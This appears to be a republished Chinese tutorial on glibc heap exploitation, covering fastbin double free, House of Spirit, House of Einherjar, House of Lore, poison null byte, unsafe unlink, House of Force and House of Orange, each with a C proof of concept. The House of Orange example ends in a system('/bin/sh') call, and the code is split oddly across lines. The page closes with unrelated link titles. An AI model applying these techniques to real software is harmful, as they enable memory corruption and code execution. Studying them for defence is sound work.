Linux heap 學習（下）

2018-09-20 17:05:27 合天網安實驗室

上週我們學習了Linux heap 學習上，今天的文章繼續第二部分的內容

title: Linux heap 學習

tags: Heap,pwn,linux

grammar_cjkRuby: true

利用週末的時間，系統的學習了linux 系統的glibc堆分配機制，從中瞭解了很多以前很模糊的東西。本文打算系統的講解一下關於堆的分配和使用機制，同時思考可能存在的一些攻擊方法。

0x03 Heap 漏洞利用方法

Fast bin 類型

0x1 Double free

在fastbin中存在的一種漏洞利用方式，fastbin在free堆塊時會檢查是否重複釋放同一個堆塊。如果我們繞過了安全機制將一個堆塊釋放了兩次，那麼就可以通過malloc的堆塊對fastbin鏈表中的堆塊的fd進行改寫，從而可以實現申請任意內存的目的。

下面是具體的利用方法：

#include
 

#include 

 

int
 main()
{
 
unsigned
 
long
 
long
 stack_var[
2
];
 fprintf(stderr, 
"The address we want malloc() to return is %p.\n"
, 
16
+(
char
 *)stack_var);
 
int
 *a = malloc(
8
);
 
int
 *b = malloc(
8
);
 
int
 *c = malloc(
8
);
 free(a);
 free(b);
//Pass the free check 
 free(a);
 
unsigned
 
long
 
long
 *d = malloc(
8
); 

 malloc(
8
);
//Now the fastbin list has only a left
 stack_var[
1
] = 
0x20
;
 fprintf(stderr, 
"Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n"
, a);
 *d = (
unsigned
 
long
 
long
) (((
char
*)&stack_var) );
 fprintf(stderr, 
"3rd malloc(8): %p, putting the stack address on the free list\n"
, malloc(
8
));
 fprintf(stderr, 
"4th malloc(8): %p\n"
, malloc(
8
));
}

利用方法比較簡單，繞過檢查機制，兩次申請內存，重寫fastbin堆塊的鏈表，造成任意內存地址申請。

0x2 Fastbin cover fd

通過前一個fastbin覆蓋後面的fastbin的fd使得下下次分配的時候可以得到任意地址（這裡測試的是bss段

具體操作方法如下

#include
 

#include
 

#include
 

#include
 

#include
 

long
 
long
 
int 

 fake_chunk[
100
];
int
 main(
int
 argc, 
char
 *argv[]) 
{
 
void
 *buf0,*buf1,*buf2,*buf3;
 fake_chunk[
1
]=
0x41
;
 buf0 = malloc(
0x30
);
 buf1 = malloc(
0x30
);
 free(buf1);
 
int
 *offset = (
char
 *)buf0+
0x40
;
//find next chunk's fd point address
 *offset = fake_chunk;
//chunk->fd = fake_chunk
 buf2 = malloc(
0x30
);
 buf3 = malloc(
0x30
);
 printf(
"發生溢出的chunk2被分配\n%p\n溢出改寫的fd地址被分配\n%p\n"
,buf2,buf3);
 
return
 
0
; 

}

通過溢出前一塊，覆蓋下一塊fd指針。關鍵在於bypass malloc fastbin安全檢測，看大小是否是fastbin的範圍
0x3 House of Spirit
看到fastbin的鏈表結構是不是又想到一種，如果free一個假的堆塊指針，那麼他也會插進fastbin鏈表，這時再次申請相同內存空間（注意大小），就可以對我們偽造的一段內存進行操作。
下面是具體的利用方法。

#include
 

#include
 

#include
 

#include
 

#include
 

long
 
long
 
int
 
Fakechunk
[
100
];
int
 main()
{
 
void
 *p;
 malloc(
1
);
 
Fakechunk
[
1
]=
0x31 

;
 
Fakechunk
[
7
]=
0X11
;
//set prev_inuse bit 1 to bypass the free check
 p=&
Fakechunk
[
2
];
 free(p);
//put the chunk to fastbin list
 p=malloc(
0x20
);
 printf(
" 任意地址:%p\n"
,p);
}

主要還是在free的時候檢查的不夠仔細，造成偽造chunk插入fastbin的現象。
Small bin 類型
0x1 House of Einherjar
此漏洞的根本原因在於在執行free函數是，檢測previnuse位後符合合併條件就開始合併，雖然在unlink時有是否在鏈表的檢測，但是沒有對prevsize的大小進行檢測。
具體利用過程如下

#include
 

#include
 

#include
 

#include
 

#include
 

int 

 main()
{
 
uint8_t
* a;
 
uint8_t
* b;
 
uint8_t
* d;
 a = (
uint8_t
*) malloc(
0x38
);
 
int
 real_a_size = malloc_usable_size(a);
 
size_t
 fake_chunk[
6
];
 fake_chunk[
1
] = 
0x100
; 
// size of the chunk just needs to be small enough to stay in the small bin
 fake_chunk[
2
] = (
size_t
) fake_chunk; 
// fwd
 fake_chunk[
3
] = (
size_t
) fake_chunk; 
// bck
 fake_chunk[
4
] = (
size_t
) fake_chunk; 
//fwd_nextsize Remember this chunk must be large chunk, so it check the nextsize link
 fake_chunk[
5 

] = (
size_t
) fake_chunk; 
//bck_nextsize
 b = (
uint8_t
*) malloc(
0x1f0
);
//Attention low byte must be 0xf0 or 0xf8,because of null byte overflow
 
int
 real_b_size = malloc_usable_size(b);
 a[real_a_size] = 
0
; 
 
size_t
 fake_size = (
size_t
)((b-
sizeof
(
size_t
)*
2
) - (
uint8_t
*)fake_chunk);
 *(
size_t
*)&a[real_a_size-
8
] = fake_size;
 fake_chunk[
1
] = fake_size;
//prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
 
// fake_chunk[0] = real_b_size; This line is not needed
 free(b);
 
int
 *dd = malloc(
8
);
 fprintf(stderr, 
"i want to malloc: %p\n"
, 
2 

+fake_chunk);
 fprintf(stderr, 
"Now i malloc chunk's addr: %p\n"
, dd);
}

對於堆塊合併檢查的不夠到位，有漏洞可尋。
0x2 House of lore

通過偽造smallbin鏈表，欺騙smallbin將偽造鏈表加入主鏈表。從而獲得目標地址的讀寫權。
具體操作如下

/*
Advanced exploitation of the House of Lore - Malloc Maleficarum.
This PoC take care also of the glibc hardening of smallbin corruption.
[ ... ]
else
 {
 bck = victim->bk;
 if (__glibc_unlikely (bck->fd != victim)){
 errstr = "malloc(): smallbin double linked list corrupted";
 goto errout;
 }
 set_inuse_bit_at_offset (victim, nb);
 bin->bk = bck;
 bck->fd = bin;
 [ ... ]
*/
#include
 

#include
 

#include
 

#include
 

void
 jackpot(){ puts(
"Nice jump d00d"
); 
exit
(
0
); }
int
 main( 

int
 argc, 
char
 * argv[]){
 
intptr_t
* stack_buffer_1[
4
] = {
0
};
//stack1
 
intptr_t
* stack_buffer_2[
3
] = {
0
};
//stack2
 
intptr_t
 *victim = malloc(
0x80
);
 
intptr_t
 *victim_chunk = victim-
2
;
 stack_buffer_1[
0
] = 
0
;
 stack_buffer_1[
1
] = 
0
;
 stack_buffer_1[
2
] = victim_chunk;
 stack_buffer_1[
3
] = (
intptr_t
*)stack_buffer_2;
//create fd & bk point
 stack_buffer_2[ 

2
] = (
intptr_t
*)stack_buffer_1;
 
void
 *p5 = malloc(
1000
);
//avoid to add to top chunk
 free((
void
*)victim);
//
 
void
 *p2 = malloc(
1200
);
//make unsorted chunk into small chunk
 
//------------VULNERABILITY-----------
 fprintf(stderr, 
"Now emulating a vulnerability that can overwrite the victim->bk pointer\n"
);
 victim[
1
] = (
intptr_t
)stack_buffer_1; 
// victim->bk is pointing to stack
 
//------------------------------------
 
void
 *p3 = malloc(
0x80
);
//malloc old victim address 
 
char
 *p4 = malloc(
0x80
);
//get stack address
 fprintf(stderr, 
"\np4 is %p and should be on the stack!\n"
, p4); 
// this chunk will be allocated on stack
  

intptr_t
 sc = (
intptr_t
)jackpot; 
// Emulating our in-memory shellcode
 memcpy((p4+
40
-
10
-
6
), &sc, 
8
); 
// This bypasses stack-smash detection since it jumps over the canary
}

主要是可以對free掉的指針進行操作，從而使得鏈表的構成。同時繞過了smallbin 的malloc檢測，成功實現了分配棧地址，最後覆蓋了ret地址

0x3 poison null byte

此類型的漏洞比較新奇，主要利用的堆塊在向前合併時並沒有檢查前一塊堆塊的大小，導致了合併現象的發生，從而可以操作已經malloc的內存區域。

申請三個連續的內存a，b，c
釋放b，並且將末尾塊的前8byte設置成虛假的prevsize，用來保護c塊中真實的prevsize
用a的0 byte 溢出覆蓋b堆塊的size位，使得大小變小，且正好在prev_size的上面
連續申請b1,b2，注意總大小不要超過b，這樣使得c的P位始終保持為0，為的是後面的free(c)合併操作，這時因為有2中的fake prev_size的保護所以一直沒有變
最後free(c)，檢測b1是否在freebin的鏈表中

#include
 
 

#include
 

#include
 

#include
 

#include
 

int
 main()
{
 
uint8_t
* a;
 
uint8_t
* b;
 
uint8_t
* c;
 
uint8_t
* b1;
 
uint8_t
* b2;
 
uint8_t
* d;
 a = (
uint8_t
*) malloc(
0x100
);
 fprintf(stderr, 
"a: %p\n"
, a);
 
int
 real_a_size = malloc_usable_size(a);
 b = ( 

uint8_t
*) malloc(
0x200
);
 fprintf(stderr, 
"b: %p\n"
, b);
 c = (
uint8_t
*) malloc(
0x100
);
 fprintf(stderr, 
"c: %p\n"
, c);
 
uint64_t
* b_size_ptr = (
uint64_t
*)(b - 
8
);
 *(
size_t
*)(b+
0x1f0
) = 
0x200
;
//fake prev_size
 free(b);
 a[real_a_size] = 
0
; 
// this 0 byte change the size of chunk to save the old prev_size
 b1 = malloc(
0x100
);
 b2 = malloc(
0x80
);
 fprintf(stderr, 
"b2: %p\n"
,b2);
 memset(b2,
'B'
,
0x80
);
 fprintf(stderr,  

"Current b2 content:\n%s\n"
,b2);
 free(b1);
//to marge with c
 *(
size_t
*)(c-
8
) = 
0xf0
;
 *(
size_t
*)(c+
0xe8
) = 
0x21
;
 free(c);
 d = malloc(
0x200
);
//get b memery
 memset(d,
'D'
,
0x200
);
 fprintf(stderr, 
"New b2 content:\n%s\n"
,b2);
}

重點還是在於那個fake prev_size，一個很奇特的用法

0x4 overlapping chunks after free

首先創建兩個smallbin，然後正常free掉一個smallbin ，然後更改free掉的chunk的size，使之包含下一個chunk，再次malloc即可對下一chunk進行操作

#include
 

#include
 

#include
 

#include
 

#include
 

long
 
long
 
int
 fake_chunk[
100
];
int
 main(
int
 argc, 
char 

 *argv[]) 
{
 
void
 *buf0,*buf1,*buf2,*buf3;
 fake_chunk[
1
]=
0x41
;
 buf0 = malloc(
0x80
);
 buf1 = malloc(
0x80
);
 free(buf0);
 
int
 *offset = (
char
 *)buf0-
8
;
//find next chunk's fd point address
 *offset = 
0x201
;
//chunk->fd = fake_chunk
 buf3 = malloc(
0x1f0
);
 memset(buf3,
'1'
,
0x190
);
 printf(
"%s\n"
,buf1 );
 
return
 
0
;
}

0x5 overlapping chunks before free

上一個是在free之後更改大小，這一次是在free之前更改大小

/*
 Yet another simple tale of overlapping chunk.
 This technique is taken from
 https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf.
 This is also referenced as Nonadjacent Free Chunk Consolidation Attack.
*/
#include
 

#include
 

#include
 

#include
 

#include
 

int
 main(){
 
intptr_t
 *p1,*p2,*p3,*p4,*p5,*p6;
 
unsigned
 
int
 real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
 
int
 prev_in_use =  

0x1
;
 p1 = malloc(
1000
);
 p2 = malloc(
1000
);
 p3 = malloc(
1000
);
 p4 = malloc(
1000
);
 p5 = malloc(
1000
);
 real_size_p1 = malloc_usable_size(p1);
 real_size_p2 = malloc_usable_size(p2);
 real_size_p3 = malloc_usable_size(p3);
 real_size_p4 = malloc_usable_size(p4);
 real_size_p5 = malloc_usable_size(p5);
 memset(p1,
'A'
,real_size_p1);
 memset(p2,
'B'
,real_size_p2);
 memset(p3,
'C'
,real_size_p3);
 memset(p4,
'D'
,real_size_p4);
 memset(p5,
'E'
,real_size_p5);
 free(p4);
 *(
unsigned
 
int
 *)((
unsigned
 
char
 *)p1 + real_size_p1 ) = real_size_p2 + real_size_p3 + prev_in_use + 
sizeof
(
size_t 

) * 
2
; 
// free(p2);
 p6 = malloc(
2000
);
 real_size_p6 = malloc_usable_size(p6);
 fprintf(stderr, 
"\nData inside chunk p3: \n\n"
);
 fprintf(stderr, 
"%s\n"
,(
char
 *)p3); 
 fprintf(stderr, 
"\nLet's write something inside p6\n"
);
 memset(p6,
'F'
,
1500
); 
 fprintf(stderr, 
"\nData inside chunk p3: \n\n"
);
 fprintf(stderr, 
"%s\n"
,(
char
 *)p3); 
}

起因還是可以隨意更改chunk的size

unsorted bin 類型

0x1 unsorted bin attack

通過對unsorted 堆塊指針的篡改，使得在unsorted bin鏈表中拆掉時，造成任意地址寫漏洞。

並且只是單向鏈表的賦值 p->bk->fp=p->fp

#include
 

#include
 

int
 main(){
 
unsigned
 
long
 stack_var1=
1
;
 
unsigned
 
long
 stack_var2=
2
;
 
unsigned
 
long
 *q,*p=malloc(
400
);
 q=malloc(
500
);
 free(p);
 
//------------VULNERABILITY-----------
 p[
1 

]=(
unsigned
 
long
)(&stack_var1-
2
);
 p[
0
] = (
unsigned
 
long
)(q);
 
//------------------------------------
 malloc(
400
);
//this option will check fastbin smallbin ,the last one is unsorted bin .if not find fit chunk in unsorted bin it will make the chunk into small or large bin list
 fprintf(stderr, 
"%p: %p\n"
, &stack_var1, (
void
*)stack_var1);
 fprintf(stderr, 
"%p: %p\n"
, &stack_var2, (
void
*)stack_var2);
}

這裡有個疑問在unsortedbin 的chunk拆下來時，其fd中的地址內容並沒有改變，推測只改變了bk指針內的內容。

0x2 unsafe unlink

在空閒堆塊合併的時候執行unlink函數，通過偽造fd和bk指針達到修改任意地址的目的。注意unlink的安全檢測，具體操作如下

申請兩個連續的chunk
在第一個chunk中偽造一個fake chunk
將bss的指針參數地址填寫到fake chunk的fd，bk，並且能夠繞過檢測unlink
free(chunk2) 發生合併，並執行unlink，將free chunk從鏈表中卸掉

#include
 

#include
 

#include
 

#include
  


uint64_t
 *chunk0_ptr;
int
 main()
{
 
int
 malloc_size = 
0x80
; 
//we want to be big enough not to use fastbins
 
int
 header_size = 
2
;
 chunk0_ptr = (
uint64_t
*) malloc(malloc_size); 
//chunk0
 
uint64_t
 *chunk1_ptr = (
uint64_t
*) malloc(malloc_size); 
//chunk1
 chunk0_ptr[
2
] = (
uint64_t
) &chunk0_ptr-(
sizeof
(
uint64_t
)*
3
);
 chunk0_ptr[
3
] = (
uint64_t
) &chunk0_ptr-(
sizeof
(
uint64_t
)*
2
); 

 
uint64_t
 *chunk1_hdr = chunk1_ptr - header_size;
 chunk1_hdr[
0
] = 
0x80
;
//fake size of prev chunk
 chunk1_hdr[
1
] &= ~
1
;
//make prev chunk free
 free(chunk1_ptr);
 
char
 victim_string[
8
];
 strcpy(victim_string,
"Hello!~"
);
 chunk0_ptr[
3
] = (
uint64_t
) victim_string;
 fprintf(stderr, 
"Original value: %s\n"
,victim_string);
 chunk0_ptr[
0
] = 
0x4141414142424242LL
;
 fprintf(stderr, 
"New Value: %s\n"
,victim_string);
}

這種利用方法只需繞過unlink的鏈表檢測，操作比較簡單

Top chunk 類型

0x1 House of Force

這個類型的漏洞利用方法比較簡單，通過溢出更改topchunk的大小（這裡改成-1），從而可以malloc到想要的內存地址

具體利用流程如下

#include
 

#include
 

#include
 

#include
 

#include
 

#include
 

char 

 bss_var[] = 
"This is a string that we want to overwrite."
;
int
 main(
int
 argc , 
char
* argv[])
{
 
intptr_t
 *p1 = malloc(
256
);
 
int
 real_size = malloc_usable_size(p1);
 
//----- VULNERABILITY ----
 
intptr_t
 *ptr_top = (
intptr_t
 *) ((
char
 *)p1 + real_size);
 ptr_top[
0
] = -
1
;
//change the size of topchunk
 
//------------------------
 
unsigned
 
long
 evil_size = (
unsigned
 
long
)bss_var - 
sizeof
(
long
)*
2
 - ( 

unsigned
 
long
)ptr_top;
//except bss_var head's length sizeof(long)*2
 
void
 *new_ptr = malloc(evil_size);
 
void
* ctr_chunk = malloc(
100
);
 fprintf(stderr, 
"... old string: %s\n"
, bss_var);
 strcpy(ctr_chunk, 
"YEAH!!!"
);
 fprintf(stderr, 
"... new string: %s\n"
, bss_var);
}

這裡BSS段在heap的前面所以說相當於malloc函數向前申請了空間，這一點不知道是如何做到的，並且這裡缺少安全機制的檢測

0x2 The house of orange

這個漏洞的利用過程很是奇妙，主要利用了在執行abort的時候調用了 _IO_flush_all_lockp函數，這裡需要了解 IO_FILE_ALL的結構，

所以這個漏洞的根本原因在於，重寫了存儲 IO_FILE_ALL的指針，通過觸發malloc函數中的unlink操作使得檢測失敗，執行難abort函數，然而其中的 _IO_flush_all_lockp函數早已被替換為其他的地址，成功劫持執行流。

幾個步驟

申請兩個大於fastbin大小的堆塊，並且把第一個chunk釋放掉（主要是為了獲得fp，bk指針）
偽造iofile，通過unsorted attack去更改iofile指針中的內容
更改被free chunk的大小（將該chunk存放在特定的smallbin中）
執行malloc 申請內存大小不同於上述的chunk，通過unsorted的遍歷觸發malloc abort函數

#include
 

#include
 

#include
 

int
 winner ( 
char
 *ptr);
int
 main()
{
  

char
 *p1, *p2;
 
size_t
 io_list_all, *top;
 p1 = malloc(
0x400
-
16
);
 malloc(
0x400
-
16
);
 free(p1);
 top = (
size_t
 *) ( (
char
 *) p1 - 
16
);
 io_list_all = top[
2
] +
0x9e8
;
 top[
3
] = io_list_all - 
0x10
;
 memcpy( ( 
char
 *) top, 
"/bin/sh\\x00"
, 
8
);
 top[
1
] = 
0x61
;
 _IO_FILE *fp = (_IO_FILE *) top;
 fp->_mode = 
0
; 
// top+0xc0 

 fp->_IO_write_base = (
char
 *) 
2
; 
// top+0x20
 fp->_IO_write_ptr = (
char
 *) 
3
; 
// top+0x28
 
size_t
 *jump_table = &top[
12
]; 
// controlled memory
 jump_table[
3
] = (
size_t
) &winner;
 *(
size_t
 *) ((
size_t
) fp + 
sizeof
(_IO_FILE)) = (
size_t
) jump_table; 
// top+0xd8
 
/* Finally, trigger the whole chain by calling malloc */
 malloc(
0x40
);
// size <= 0x50
 
return
 
0
;
}
int
 winner(
char
 *ptr)
{  

 system(ptr);
 
return
 
0
;
}

注意幾個要點

程序流劫持是abort中的函數造成的，具體的操作是替換了IO_FILE的指針
替換指針的操作是unsorted bin從鏈表中拆除造成的
修改堆塊的大小是為了將chunk插入相對應偏移的smallbin list中
malloc異常是由unsorted bin指針異常引起的

分享到:

閱讀更多 合天網安實驗室 的文章

關鍵字: 0verflow Line Linux

Linux：頁表中PGD、PUD、PMD等概念介紹

Linux FAT 文件系統預讀缺陷，補丁提升 7 倍性能

Linux 下epoll 網絡模型為什麼需要epoll?

Windows 支持直接訪問 Linux 子系統文件：你的下一臺 Linux 何必是 Linux

體驗 DebianDog：Puppy 式的 Debian Linux

Linux 最常用命令：簡單易學

kali Linux 筆記

2020 Kali linux root權限修正版

Linux 用戶登錄記錄

Linux 內核到底長啥樣？

如何在 Linux 中更改 MAC 地址

linux 查看機器cpu核數

一文看懂如何使用 Linux seq 命令生成數字序列

Linux 系統查看服務器SN序列號以及服務器型號

免費在線試用 200+ Linux 和 Unix 操作系統

03.07 Linux 下進入文件，提示沒有那個文件或者目錄問題

玩轉 Linux，掌握這些 Linux 命令就夠了

03.04 玩轉 Linux，掌握這些 Linux 命令就夠了

03.01 Linux 常見高危操作

02.27 Linux 守護進程創建原理及簡易方法

Kali-Linux-2020.1 安裝/Live USB啟動盤製作

樹莓派 Linux 操作系統大全

02.22 玩轉 Linux，掌握這些 Linux 命令就夠了

「LINUX」乾貨：文件批量轉換為UTF8編碼-enca

linux poll機制

優麒麟UKUI桌面環境登陸Arch Linux

比 Deepin Linux 更好的 Linux 發行版

「Linux」 Centos7系統介紹與安裝

01.28 為什麼說 Manjaro Linux 是最好用的 Linux

「重要」Kali Linux 使用風險提示

12.17 「重要」Kali Linux 使用風險提示

Linux Kernel 5.5 最終刪除 SYSCTL 系統調用

發行版介紹-Oracle Linux

全面介紹 Linux 權限

Linux 系統調用 API 之文件 I

linux C GDB 調試技巧

如何升級 Linux Mint 19.1 為 Linux Mint 19.2

Linux 學習筆記之，特殊權限 SUIG、SGID、SBIT

linux 課程學習第三天

02.02 監控 Linux 服務器活動的幾個命令

理解 Linux 網絡棧：Linux 網絡協議棧簡單總結

「Linux」使用tc命令增加網絡延時

09.10 介紹 Linux 中的管道和命名管道

Linux 虛擬機與 Linux Live 鏡像

Oracle Linux 系統如何去註冊使用堅不可摧 Linux 網絡（ULN）

04.23 Linux 文件與目錄管理常用命令

03.26 linux-netstat已經過時，你該用ss了！

第二章 IoC容器和Bean配置

bean是一個對象，它是由Spring

運算裡不得不說的python模塊—math

Help

Devops度量--DevOps 現狀快速檢查表

今天主要分享一個DevOps

SOP是什麼（解讀）

SOP不是單個的，是一個體系，雖然我們可以單獨地定義每一個SOP，但真正從企業管理來看，SOP不可能只是單個的，必然是一個整體和體系，也是企業不可或缺的。

還不知道交換機上如何配置DHCP，趕緊過來圍觀吧，一分鐘包你學會

隨著終端設備的越來越多，人工干預配置IP地址，不僅工作效率低，而且，還很容易導致IP衝突，影響正常的網絡訪問。到此已經完成了，DHCP服務的配置了，我們可以在終端驗證。

還在手動配置IP地址嗎？太Low了，一分鐘教會您如何配置DHCP

Python爬蟲自學筆記：分析頭條文章網頁源文件

這兩天分析了一下頭條文章網頁的源文件，現在將分析的結果分享給大家。首先以一篇文章為例，其網址如下：https://www.toutiao.com/i6822245428176617998/如上圖網頁所示，文章中包含文字和圖片。

DNS偵查工具

我們只需要打開瀏覽器輸入例如:www.baidu.com就可以解析到該網站.為了便於記住不需要輸入長長的IP地址去訪問這就是DNS域名解析.關於域名域名的層次劃分用點來分割這時DNS把相對應的域名解析成IP地址高的在右邊.例如:www. NS簡介訪問某網站的時候最低在左邊

國人開源的異步 Python ORM：GINO

程序測評：Create React App 3.3中有哪些酷炫新功能？

Create

“明學”的魅力？我只要我覺得：駕馭終端，提高生產力

最後一個要介紹的命令是

（必收藏系列）Linux面試題——命令集

關注，後臺私信【Linux】分享Linux入門到進階電子書、Linux入門到精通視頻教程（免費）。文件管理命令cat

五分鐘學會如何在 IPFS 上部署網站

原文標題:五分鐘學會如何在

「正點原子NANO STM32F103開發板資料連載」第29章內存管理實驗

1）實驗平臺：【正點原子】

小白怎麼學Web前端開發如何成為技術達人

Web前端開發工程師已經成為了很多年輕人心中的理想工作，不僅入行門檻低、而且薪資待遇和發展前景都不錯，自然吸引了大批人加入行業。

如何開發一個web靜態服務器

我們都知道如今的web服務器有很多，比如著名的有apache，有nginx，有tomcat，有resin服務器，有sphere，有iis服務器等等，這些服務器都能提供web服務，並且幾乎都能和多種語言進行搭配使用，那麼一個web服務器都需要那些功能，開發一個web服務器都需要那些

學Java編程還有前景嗎如何才能拿到高薪

需求大、薪資高似乎是Java開發人員的標籤，不過學Java編程還有前景嗎？它架構在操作系統之上，屏蔽了底層的差異，真正實現了“Writeonce run

Python網絡爬蟲之配置篇（一）

pip

SpringBoot 整合SpringSecurity示例實現前後分離權限註解+JWT登錄認證

serverTimezone=UTC&useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertTo&useSSL=falseusername:rootpassword:

Python的運行效率太低？幾行代碼快速提升！

return的就是是你所需要的結果2.3、運行這一步就是最後一步了，只要像下面一樣輸入上述函數名，賦予參數值，點擊運行Run，就能得到你想要的結果arg1=5

python的優點是什麼？最新Python400集視頻（附教程）

2020，最新Python零基礎到精通資料教材，乾貨分享，新基礎Python教材，穩穩找到過萬工作，看這裡，這裡有你想要的所有資源哦，最強筆記，教你怎麼入門提升！獲取方式：私信小編“

MySQL中OOM故障應如何下手-愛可生

作者：孫祚龍愛可生南區分公司交付服務部成員，實習工程師。負責公司產品問題排查及日常運維工作。本文來源：原創投稿*愛可生開源社區出品，原創內容未經授權不得隨意使用，轉載請聯繫小編並註明來源。

像專家一樣使用 panic

|go

30種不同的編程語言怎麼寫“Hello, World”

printfn

percona QAN 介紹

一、背景QAN慢查詢日誌分析工具是PMM

面試官：你可以用純CSS判斷鼠標進入的方向嗎？

雖然沒什麼軟用，但是對付面試官應該是夠用了。感謝面試官提出的問題，讓我實現了這個功能，對CSS

網絡工程師職業生涯中，哪兩點是最重要的？

網絡工程師最重要的技能是紮實的基礎和非常開放的思維，微觀知識紮實、宏觀能力突出。項目經驗也會讓網絡工程師基礎更牢靠，網絡工程師是要實戰的，要避免紙上談兵，我認為對基礎理論的理解，比你清楚配置更重要。

交換機中相關術語代表什麼意思，有必要弄清楚

由淺入深瞭解以太坊 2.0：最常見問題和最全學習清單

有關以太坊2.0

【Linux簡單實用小命令001】CentOS 7、8的防火牆端口開放

yuminstall

吃透這些IPFS硬核知識點，日後搶頭礦隨時“彎道超車”

今天的你捉住IPFS機遇了嗎？我們都知道在Filecoin網絡中作為一名存儲礦工，信譽對於我們是非常重要的——信譽越高，爆塊幾率越大。那麼信譽系統現在怎麼樣了呢？

Hive分桶表

fieldsterminated

Spring中資源的加載原來是這麼一回事啊！

自己動手搭建郵件系統：怎樣讓Exchange Server 發出第一封郵件？

編輯Exchange

$【MySQL】RDS物理備份文件(.idb\.frm)恢復到MySQL自建數據庫$

【MySQL】RDS物理備份文件(.idb\.frm)恢復到MySQL自建數據庫

在阿里雲控制檯，我們能下載的文件是一個壓縮包，解壓之後，是.idb和.frm文件，你可能要問了，我可以直接把解壓好的問題件覆蓋到MySQL的data目錄下嗎？

NLP算法入門系列：隱含馬爾可夫鏈(HMM)模型的簡單介紹

即，最大化

第一章 Spring Framework概述

您可以在任何web

opencv人工智能深度學習這樣實現人臉的年齡檢測

前期的文章我們分享了人臉的識別以及如何進行人臉數據的訓練，本期文章我們結合人臉識別的模型進行人臉年齡的檢測人臉年齡的檢測步驟1、首先需要進行人臉的檢測2、把檢測到的人臉數據給年齡檢測模型去檢測3、把檢測結果呈現到圖片上人臉年齡檢測import

嵌入式linux網絡編程之——5年程序員給你深度講解socket套接字

圖8-1

深入瞭解ProcessFunction的狀態操作(Flink-1.10)

先反思為何會有上述疑惑上述疑惑產生的原因，應該是受到平時使用HashMap的影響，HashMap獲取值就是在調用get方法時指定key，設置值也是在put時指定key，所以看到state.value，看懂了這些，其實也是在瞭解DataStream/DataSetAPI的設計思路：

Redis內存分析工具--rdr安裝與使用

分析Redis

資深架構師教你源碼講解zookeeper實現分佈式鎖以及集群搭建步驟

//getData發現前一個子節點被刪除，拋出異常

一行代碼提升遷移性能

論文原址：https://arxiv.org/pdf/2003.12237.pdf開源地址：https://github.com/cuishuhao/BNM在發表在CVPR2020

利用相似幾何信息，做可泛化3D形狀分割模型

更具體的有以下三種典型的分割方案：FullyConvolutional-Like

這麼好用的開源計算器SpeedCrunch，沒有不嘗試一下的道理

介紹SpeedCrunch是一款高精度科學計算器，具有快速，鍵盤驅動的用戶界面。獲取方式在GitHub上搜索SpeedCrunch，就可以去到

分佈式緩存，真香

他是前易寶支付架構師、阿里雲MVP、騰訊雲

特徵工程的力量

在本文中，我希望教給您一些有關特徵工程的知識，以及如何使用它來對非線性決策邊界進行建模。為了說明這一點，假設恢復時間與身高和體重具有以下關係：Y=β₀+β₁+β2+β₃+noise從第三項來看，我們可以看到Y與身高和體重沒有線性關係。

java架構：天天寫面向接口編程，你考慮過性能嗎？大神都是這麼寫

public

SpringBoot如何優雅的使用RocketMQ

源碼編譯需要Maven3.2x，JDK8在根目錄進行打包:Copymvn-Prelease-all

css代碼規範工具stylelint

"mixin"